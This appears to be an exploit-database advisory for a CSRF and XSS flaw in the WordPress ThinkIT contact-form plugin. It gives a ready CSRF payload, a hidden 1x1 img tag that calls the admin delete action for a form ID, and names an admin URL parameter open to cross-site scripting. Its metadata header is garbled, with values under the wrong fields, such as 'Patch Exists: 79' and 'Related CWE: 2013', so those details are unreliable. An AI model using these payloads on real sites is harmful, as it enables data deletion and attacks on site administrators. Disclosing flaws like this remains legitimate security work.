vendor: a:thinkoverit:thinkit
by: Yashar shahinzadeh
CVSS: 4,3 (MEDIUM)
CSRF/XSS
Product Name: a:thinkoverit:thinkit
Affected Version From: Update to the latest version of the plugin
Affected Version To: Yes
Patch Exists: 79
Related CWE: 2013
CPE: 0.1
Metasploit: Linux & Windows PHP 5.2.9
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Thinkoverit

WordPress ThinkIT plugin – CSRF / XSS

The contact form ID can be read directly from the HTML page source: <input type="hidden" value="[ID]" name="toit-form-id"></input>, where [ID] is the form ID. The following crafted exploit can be used to delete the form completely: <img src="http://[WP]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1">. Cross-site scripting is possible via http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf

Mitigation: N/A